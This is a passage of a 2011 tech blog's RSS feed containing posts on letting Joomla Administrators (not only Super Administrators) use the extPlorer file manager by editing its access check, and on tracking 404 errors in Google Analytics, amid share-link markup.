			<a href="http://www.shareaholic.com/api/share/?title=PHP+detect+homepage&amp;link=http://www.timbystechtalk.com/index.php/2011/06/04/php-detect-homepage/&amp;notes=I%20won%27t%20lie%2C%20I%20am%20mainly%20writing%20this%20blog%20post%20for%20me%20as%20I%20always%20seem%20to%20forget%20this%20simple%20code%20for%20some%20reason%21%20I%20also%20thought%20there%20was%20a%20good%20chance%20others%20may%20be%20in%20the%20same%20boat%20as%20well%20so%20that%20sealed%20the%20deal.%0D%0A%0D%0AThis%20script%20is%20particularly%20useful%20if%20you%20have%20included%20pages%20across%20your%20enti&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=PHP+detect+homepage&amp;link=http://www.timbystechtalk.com/index.php/2011/06/04/php-detect-homepage/&amp;notes=I%20won%27t%20lie%2C%20I%20am%20mainly%20writing%20this%20blog%20post%20for%20me%20as%20I%20always%20seem%20to%20forget%20this%20simple%20code%20for%20some%20reason%21%20I%20also%20thought%20there%20was%20a%20good%20chance%20others%20may%20be%20in%20the%20same%20boat%20as%20well%20so%20that%20sealed%20the%20deal.%0D%0A%0D%0AThis%20script%20is%20particularly%20useful%20if%20you%20have%20included%20pages%20across%20your%20enti&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=PHP+detect+homepage&amp;link=http://www.timbystechtalk.com/index.php/2011/06/04/php-detect-homepage/&amp;notes=I%20won%27t%20lie%2C%20I%20am%20mainly%20writing%20this%20blog%20post%20for%20me%20as%20I%20always%20seem%20to%20forget%20this%20simple%20code%20for%20some%20reason%21%20I%20also%20thought%20there%20was%20a%20good%20chance%20others%20may%20be%20in%20the%20same%20boat%20as%20well%20so%20that%20sealed%20the%20deal.%0D%0A%0D%0AThis%20script%20is%20particularly%20useful%20if%20you%20have%20included%20pages%20across%20your%20enti&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.shareaholic.com/api/share/?title=PHP+detect+homepage&amp;link=http://www.timbystechtalk.com/index.php/2011/06/04/php-detect-homepage/&amp;notes=I%20won%27t%20lie%2C%20I%20am%20mainly%20writing%20this%20blog%20post%20for%20me%20as%20I%20always%20seem%20to%20forget%20this%20simple%20code%20for%20some%20reason%21%20I%20also%20thought%20there%20was%20a%20good%20chance%20others%20may%20be%20in%20the%20same%20boat%20as%20well%20so%20that%20sealed%20the%20deal.%0D%0A%0D%0AThis%20script%20is%20particularly%20useful%20if%20you%20have%20included%20pages%20across%20your%20enti&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=74&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=PHP+detect+homepage&amp;link=http://www.timbystechtalk.com/index.php/2011/06/04/php-detect-homepage/&amp;notes=I%20won%27t%20lie%2C%20I%20am%20mainly%20writing%20this%20blog%20post%20for%20me%20as%20I%20always%20seem%20to%20forget%20this%20simple%20code%20for%20some%20reason%21%20I%20also%20thought%20there%20was%20a%20good%20chance%20others%20may%20be%20in%20the%20same%20boat%20as%20well%20so%20that%20sealed%20the%20deal.%0D%0A%0D%0AThis%20script%20is%20particularly%20useful%20if%20you%20have%20included%20pages%20across%20your%20enti&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=PHP+detect+homepage&amp;link=http://www.timbystechtalk.com/index.php/2011/06/04/php-detect-homepage/&amp;notes=I%20won%27t%20lie%2C%20I%20am%20mainly%20writing%20this%20blog%20post%20for%20me%20as%20I%20always%20seem%20to%20forget%20this%20simple%20code%20for%20some%20reason%21%20I%20also%20thought%20there%20was%20a%20good%20chance%20others%20may%20be%20in%20the%20same%20boat%20as%20well%20so%20that%20sealed%20the%20deal.%0D%0A%0D%0AThis%20script%20is%20particularly%20useful%20if%20you%20have%20included%20pages%20across%20your%20enti&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-sphinn">
			<a href="http://www.shareaholic.com/api/share/?title=PHP+detect+homepage&amp;link=http://www.timbystechtalk.com/index.php/2011/06/04/php-detect-homepage/&amp;notes=I%20won%27t%20lie%2C%20I%20am%20mainly%20writing%20this%20blog%20post%20for%20me%20as%20I%20always%20seem%20to%20forget%20this%20simple%20code%20for%20some%20reason%21%20I%20also%20thought%20there%20was%20a%20good%20chance%20others%20may%20be%20in%20the%20same%20boat%20as%20well%20so%20that%20sealed%20the%20deal.%0D%0A%0D%0AThis%20script%20is%20particularly%20useful%20if%20you%20have%20included%20pages%20across%20your%20enti&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=100&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Sphinn this on Sphinn">Sphinn this on Sphinn</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=PHP+detect+homepage&amp;link=http://www.timbystechtalk.com/index.php/2011/06/04/php-detect-homepage/&amp;notes=I%20won%27t%20lie%2C%20I%20am%20mainly%20writing%20this%20blog%20post%20for%20me%20as%20I%20always%20seem%20to%20forget%20this%20simple%20code%20for%20some%20reason%21%20I%20also%20thought%20there%20was%20a%20good%20chance%20others%20may%20be%20in%20the%20same%20boat%20as%20well%20so%20that%20sealed%20the%20deal.%0D%0A%0D%0AThis%20script%20is%20particularly%20useful%20if%20you%20have%20included%20pages%20across%20your%20enti&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=PHP+detect+homepage&amp;link=http://www.timbystechtalk.com/index.php/2011/06/04/php-detect-homepage/&amp;notes=I%20won%27t%20lie%2C%20I%20am%20mainly%20writing%20this%20blog%20post%20for%20me%20as%20I%20always%20seem%20to%20forget%20this%20simple%20code%20for%20some%20reason%21%20I%20also%20thought%20there%20was%20a%20good%20chance%20others%20may%20be%20in%20the%20same%20boat%20as%20well%20so%20that%20sealed%20the%20deal.%0D%0A%0D%0AThis%20script%20is%20particularly%20useful%20if%20you%20have%20included%20pages%20across%20your%20enti&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%24%7Btitle%7D+-+%24%7Bshort_link%7D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://www.timbystechtalk.com/index.php/2011/06/04/php-detect-homepage/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Allowing Administrator access to Joomla&#8217;s Extplorer</title>
		<link>http://www.timbystechtalk.com/index.php/2011/05/10/allowing-administrator-access-to-joomlas-extplorer/</link>
		<comments>http://www.timbystechtalk.com/index.php/2011/05/10/allowing-administrator-access-to-joomlas-extplorer/#comments</comments>
		<pubDate>Tue, 10 May 2011 05:49:55 +0000</pubDate>
		<dc:creator>Timby</dc:creator>
				<category><![CDATA[Joomla]]></category>
		<category><![CDATA[joomla components]]></category>

		<guid isPermaLink="false">http://www.timbystechtalk.com/?p=354</guid>
		<description><![CDATA[Not a whole lot to say about this post but I couldn&#8217;t find any information on the net at all about this so I thought it needed to be posted. In this post I&#8217;m talking about the Joomla component extPlorer - http://extensions.joomla.org/extensions/core-enhancements/file-management/2630 Simply put this component is pretty awesome and I would highly recommend it [...]]]></description>
			<content:encoded><![CDATA[<p>Not a whole lot to say about this post but I couldn&#8217;t find any information on the net at all about this so I thought it needed to be posted.</p>
<p>In this post I&#8217;m talking about the Joomla component extPlorer -<a href=" http://extensions.joomla.org/extensions/core-enhancements/file-management/2630"> http://extensions.joomla.org/extensions/core-enhancements/file-management/2630</a></p>
<p>Simply put this component is pretty awesome and I would highly recommend it for someone that doesn&#8217;t have server access but still wants the ability to see the file structure and change folder permissions, files and all kinds of other cool stuff on the fly.</p>
<p>This component by default is Super Administrator access only, which is great in most cases! However I came across a situation where I needed to allow an Administrator access.</p>
<p>Open up <strong>administrator/components/com_extplorer/admin.extplorer.php</strong><br />
Around line 60 you will see this:</p>
<div class="codesnip-container" >
<div class="php codesnip" style="font-family:monospace;"><span class="kw1">if</span><span class="br0">&#40;</span> ext_isJoomla<span class="br0">&#40;</span><span class="st_h">&#8217;1.6&#8242;</span><span class="sy0">,</span> <span class="st_h">&#8216;&gt;=&#8217;</span> <span class="br0">&#41;</span><span class="br0">&#41;</span> <span class="br0">&#123;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="re0">$access</span> <span class="sy0">=</span> <span class="re0">$my</span><span class="sy0">-&gt;</span><span class="me1">authorise</span><span class="br0">&#40;</span><span class="st_h">&#8216;core.admin&#8217;</span><span class="br0">&#41;</span><span class="sy0">;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#125;</span> <span class="kw1">else</span> <span class="br0">&#123;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="re0">$access</span> <span class="sy0">=</span> <span class="re0">$my</span><span class="sy0">-&gt;</span><span class="me1">usertype</span> <span class="sy0">==</span> <span class="st_h">&#8216;Super Administrator&#8217;</span><span class="sy0">;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#125;</span></div>
</div>
<p>The change is dead easy really, simply replace this block of code with this one:</p>
<div class="codesnip-container" >
<div class="php codesnip" style="font-family:monospace;"><span class="kw1">if</span><span class="br0">&#40;</span> ext_isJoomla<span class="br0">&#40;</span><span class="st_h">&#8217;1.6&#8242;</span><span class="sy0">,</span> <span class="st_h">&#8216;&gt;=&#8217;</span> <span class="br0">&#41;</span><span class="br0">&#41;</span> <span class="br0">&#123;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="re0">$access</span> <span class="sy0">=</span> <span class="re0">$my</span><span class="sy0">-&gt;</span><span class="me1">authorise</span><span class="br0">&#40;</span><span class="st_h">&#8216;core.admin&#8217;</span><span class="br0">&#41;</span><span class="sy0">;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#125;</span> <span class="kw1">else</span> <span class="br0">&#123;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="co1">//timby magic to allow administrators also</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">if</span><span class="br0">&#40;</span><span class="re0">$my</span><span class="sy0">-&gt;</span><span class="me1">usertype</span> <span class="sy0">==</span> <span class="st_h">&#8216;Administrator&#8217;</span><span class="br0">&#41;</span><span class="br0">&#123;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="re0">$access</span> <span class="sy0">=</span> <span class="kw4">true</span><span class="sy0">;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#125;</span><span class="kw1">else</span><span class="br0">&#123;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="re0">$access</span> <span class="sy0">=</span> <span class="re0">$my</span><span class="sy0">-&gt;</span><span class="me1">usertype</span> <span class="sy0">==</span> <span class="st_h">&#8216;Super Administrator&#8217;</span><span class="sy0">;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#125;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#125;</span></div>
</div>
<p>And that&#8217;s it! Re-upload the files and now administrators will also have access to this cool component!</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=Allowing+Administrator+access+to+Joomla%27s+Extplorer&amp;link=http://www.timbystechtalk.com/index.php/2011/05/10/allowing-administrator-access-to-joomlas-extplorer/&amp;notes=Not%20a%20whole%20lot%20to%20say%20about%20this%20post%20but%20I%20couldn%27t%20find%20any%20information%20on%20the%20net%20at%20all%20about%20this%20so%20I%20thought%20it%20needed%20to%20be%20posted.%0D%0A%0D%0AIn%20this%20post%20I%27m%20talking%20about%20the%20Joomla%20component%20extPlorer%20-%20http%3A%2F%2Fextensions.joomla.org%2Fextensions%2Fcore-enhancements%2Ffile-management%2F2630%0D%0A%0D%0ASimply%20put&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=Allowing+Administrator+access+to+Joomla%27s+Extplorer&amp;link=http://www.timbystechtalk.com/index.php/2011/05/10/allowing-administrator-access-to-joomlas-extplorer/&amp;notes=Not%20a%20whole%20lot%20to%20say%20about%20this%20post%20but%20I%20couldn%27t%20find%20any%20information%20on%20the%20net%20at%20all%20about%20this%20so%20I%20thought%20it%20needed%20to%20be%20posted.%0D%0A%0D%0AIn%20this%20post%20I%27m%20talking%20about%20the%20Joomla%20component%20extPlorer%20-%20http%3A%2F%2Fextensions.joomla.org%2Fextensions%2Fcore-enhancements%2Ffile-management%2F2630%0D%0A%0D%0ASimply%20put&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=Allowing+Administrator+access+to+Joomla%27s+Extplorer&amp;link=http://www.timbystechtalk.com/index.php/2011/05/10/allowing-administrator-access-to-joomlas-extplorer/&amp;notes=Not%20a%20whole%20lot%20to%20say%20about%20this%20post%20but%20I%20couldn%27t%20find%20any%20information%20on%20the%20net%20at%20all%20about%20this%20so%20I%20thought%20it%20needed%20to%20be%20posted.%0D%0A%0D%0AIn%20this%20post%20I%27m%20talking%20about%20the%20Joomla%20component%20extPlorer%20-%20http%3A%2F%2Fextensions.joomla.org%2Fextensions%2Fcore-enhancements%2Ffile-management%2F2630%0D%0A%0D%0ASimply%20put&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.shareaholic.com/api/share/?title=Allowing+Administrator+access+to+Joomla%27s+Extplorer&amp;link=http://www.timbystechtalk.com/index.php/2011/05/10/allowing-administrator-access-to-joomlas-extplorer/&amp;notes=Not%20a%20whole%20lot%20to%20say%20about%20this%20post%20but%20I%20couldn%27t%20find%20any%20information%20on%20the%20net%20at%20all%20about%20this%20so%20I%20thought%20it%20needed%20to%20be%20posted.%0D%0A%0D%0AIn%20this%20post%20I%27m%20talking%20about%20the%20Joomla%20component%20extPlorer%20-%20http%3A%2F%2Fextensions.joomla.org%2Fextensions%2Fcore-enhancements%2Ffile-management%2F2630%0D%0A%0D%0ASimply%20put&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=74&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=Allowing+Administrator+access+to+Joomla%27s+Extplorer&amp;link=http://www.timbystechtalk.com/index.php/2011/05/10/allowing-administrator-access-to-joomlas-extplorer/&amp;notes=Not%20a%20whole%20lot%20to%20say%20about%20this%20post%20but%20I%20couldn%27t%20find%20any%20information%20on%20the%20net%20at%20all%20about%20this%20so%20I%20thought%20it%20needed%20to%20be%20posted.%0D%0A%0D%0AIn%20this%20post%20I%27m%20talking%20about%20the%20Joomla%20component%20extPlorer%20-%20http%3A%2F%2Fextensions.joomla.org%2Fextensions%2Fcore-enhancements%2Ffile-management%2F2630%0D%0A%0D%0ASimply%20put&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=Allowing+Administrator+access+to+Joomla%27s+Extplorer&amp;link=http://www.timbystechtalk.com/index.php/2011/05/10/allowing-administrator-access-to-joomlas-extplorer/&amp;notes=Not%20a%20whole%20lot%20to%20say%20about%20this%20post%20but%20I%20couldn%27t%20find%20any%20information%20on%20the%20net%20at%20all%20about%20this%20so%20I%20thought%20it%20needed%20to%20be%20posted.%0D%0A%0D%0AIn%20this%20post%20I%27m%20talking%20about%20the%20Joomla%20component%20extPlorer%20-%20http%3A%2F%2Fextensions.joomla.org%2Fextensions%2Fcore-enhancements%2Ffile-management%2F2630%0D%0A%0D%0ASimply%20put&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-sphinn">
			<a href="http://www.shareaholic.com/api/share/?title=Allowing+Administrator+access+to+Joomla%27s+Extplorer&amp;link=http://www.timbystechtalk.com/index.php/2011/05/10/allowing-administrator-access-to-joomlas-extplorer/&amp;notes=Not%20a%20whole%20lot%20to%20say%20about%20this%20post%20but%20I%20couldn%27t%20find%20any%20information%20on%20the%20net%20at%20all%20about%20this%20so%20I%20thought%20it%20needed%20to%20be%20posted.%0D%0A%0D%0AIn%20this%20post%20I%27m%20talking%20about%20the%20Joomla%20component%20extPlorer%20-%20http%3A%2F%2Fextensions.joomla.org%2Fextensions%2Fcore-enhancements%2Ffile-management%2F2630%0D%0A%0D%0ASimply%20put&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=100&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Sphinn this on Sphinn">Sphinn this on Sphinn</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=Allowing+Administrator+access+to+Joomla%27s+Extplorer&amp;link=http://www.timbystechtalk.com/index.php/2011/05/10/allowing-administrator-access-to-joomlas-extplorer/&amp;notes=Not%20a%20whole%20lot%20to%20say%20about%20this%20post%20but%20I%20couldn%27t%20find%20any%20information%20on%20the%20net%20at%20all%20about%20this%20so%20I%20thought%20it%20needed%20to%20be%20posted.%0D%0A%0D%0AIn%20this%20post%20I%27m%20talking%20about%20the%20Joomla%20component%20extPlorer%20-%20http%3A%2F%2Fextensions.joomla.org%2Fextensions%2Fcore-enhancements%2Ffile-management%2F2630%0D%0A%0D%0ASimply%20put&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=Allowing+Administrator+access+to+Joomla%27s+Extplorer&amp;link=http://www.timbystechtalk.com/index.php/2011/05/10/allowing-administrator-access-to-joomlas-extplorer/&amp;notes=Not%20a%20whole%20lot%20to%20say%20about%20this%20post%20but%20I%20couldn%27t%20find%20any%20information%20on%20the%20net%20at%20all%20about%20this%20so%20I%20thought%20it%20needed%20to%20be%20posted.%0D%0A%0D%0AIn%20this%20post%20I%27m%20talking%20about%20the%20Joomla%20component%20extPlorer%20-%20http%3A%2F%2Fextensions.joomla.org%2Fextensions%2Fcore-enhancements%2Ffile-management%2F2630%0D%0A%0D%0ASimply%20put&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%24%7Btitle%7D+-+%24%7Bshort_link%7D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://www.timbystechtalk.com/index.php/2011/05/10/allowing-administrator-access-to-joomlas-extplorer/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Tracking 404 hits with google analytics</title>
		<link>http://www.timbystechtalk.com/index.php/2011/05/09/tracking-404-hits-with-google-analytics/</link>
		<comments>http://www.timbystechtalk.com/index.php/2011/05/09/tracking-404-hits-with-google-analytics/#comments</comments>
		<pubDate>Mon, 09 May 2011 00:42:18 +0000</pubDate>
		<dc:creator>Timby</dc:creator>
				<category><![CDATA[Misc]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[analytics tricks]]></category>

		<guid isPermaLink="false">http://www.timbystechtalk.com/?p=350</guid>
		<description><![CDATA[I&#8217;ll keep this short as I&#8217;m in a bit of a rush but here is a handy way of tracking those annoying 404 errors via google analytics! Firstly, ensure that whenever your 404 page shows it has a custom title, something along the lines of &#8220;Websitename.com &#8211; 404 not found&#8221; so that you can easily [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ll keep this short as I&#8217;m in a bit of a rush but here is a handy way of tracking those annoying 404 errors via google analytics!</p>
<p>Firstly, ensure that whenever your 404 page shows it has a custom title, something along the lines of &#8220;Websitename.com &#8211; 404 not found&#8221; so that you can easily spot this title. You must also ensure that the URL showing in the url bar when a user hits a 404 shows the URL they are trying to access rather than websitename.com/404.html.</p>
<p>Once you have this set up and google analytics installed you are actually all good to go!</p>
<p><a href="http://www.timbystechtalk.com/wp-content/uploads/2011/05/analytics_content_by_title.jpg"><img class="alignnone size-full wp-image-351" title="analytics_content_by_title" src="http://www.timbystechtalk.com/wp-content/uploads/2011/05/analytics_content_by_title.jpg" alt="" width="264" height="399" /></a></p>
<p>Simply log into google analytics simply navigate to the &#8220;content&#8221; reports and then select &#8220;Content By Title&#8221;</p>
<p>You should see &#8220;Websitename.com &#8211; 404 not found&#8221; in this list. From there you can simply click on this title and you will see a list of 404 pages that were requested.</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=Tracking+404+hits+with+google+analytics&amp;link=http://www.timbystechtalk.com/index.php/2011/05/09/tracking-404-hits-with-google-analytics/&amp;notes=I%27ll%20keep%20this%20short%20as%20I%27m%20in%20a%20bit%20of%20a%20rush%20but%20here%20is%20a%20handy%20way%20of%20tracking%20those%20annoying%20404%20errors%20via%20google%20analytics%21%0D%0A%0D%0AFirstly%2C%20ensure%20that%20whenever%20your%20404%20page%20shows%20it%20has%20a%20custom%20title%2C%20something%20along%20the%20lines%20of%20%22Websitename.com%20-%20404%20not%20found%22%20so%20that%20you%20can%20easily%20spot%20th&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=Tracking+404+hits+with+google+analytics&amp;link=http://www.timbystechtalk.com/index.php/2011/05/09/tracking-404-hits-with-google-analytics/&amp;notes=I%27ll%20keep%20this%20short%20as%20I%27m%20in%20a%20bit%20of%20a%20rush%20but%20here%20is%20a%20handy%20way%20of%20tracking%20those%20annoying%20404%20errors%20via%20google%20analytics%21%0D%0A%0D%0AFirstly%2C%20ensure%20that%20whenever%20your%20404%20page%20shows%20it%20has%20a%20custom%20title%2C%20something%20along%20the%20lines%20of%20%22Websitename.com%20-%20404%20not%20found%22%20so%20that%20you%20can%20easily%20spot%20th&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=Tracking+404+hits+with+google+analytics&amp;link=http://www.timbystechtalk.com/index.php/2011/05/09/tracking-404-hits-with-google-analytics/&amp;notes=I%27ll%20keep%20this%20short%20as%20I%27m%20in%20a%20bit%20of%20a%20rush%20but%20here%20is%20a%20handy%20way%20of%20tracking%20those%20annoying%20404%20errors%20via%20google%20analytics%21%0D%0A%0D%0AFirstly%2C%20ensure%20that%20whenever%20your%20404%20page%20shows%20it%20has%20a%20custom%20title%2C%20something%20along%20the%20lines%20of%20%22Websitename.com%20-%20404%20not%20found%22%20so%20that%20you%20can%20easily%20spot%20th&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.shareaholic.com/api/share/?title=Tracking+404+hits+with+google+analytics&amp;link=http://www.timbystechtalk.com/index.php/2011/05/09/tracking-404-hits-with-google-analytics/&amp;notes=I%27ll%20keep%20this%20short%20as%20I%27m%20in%20a%20bit%20of%20a%20rush%20but%20here%20is%20a%20handy%20way%20of%20tracking%20those%20annoying%20404%20errors%20via%20google%20analytics%21%0D%0A%0D%0AFirstly%2C%20ensure%20that%20whenever%20your%20404%20page%20shows%20it%20has%20a%20custom%20title%2C%20something%20along%20the%20lines%20of%20%22Websitename.com%20-%20404%20not%20found%22%20so%20that%20you%20can%20easily%20spot%20th&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=74&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-linkedin">
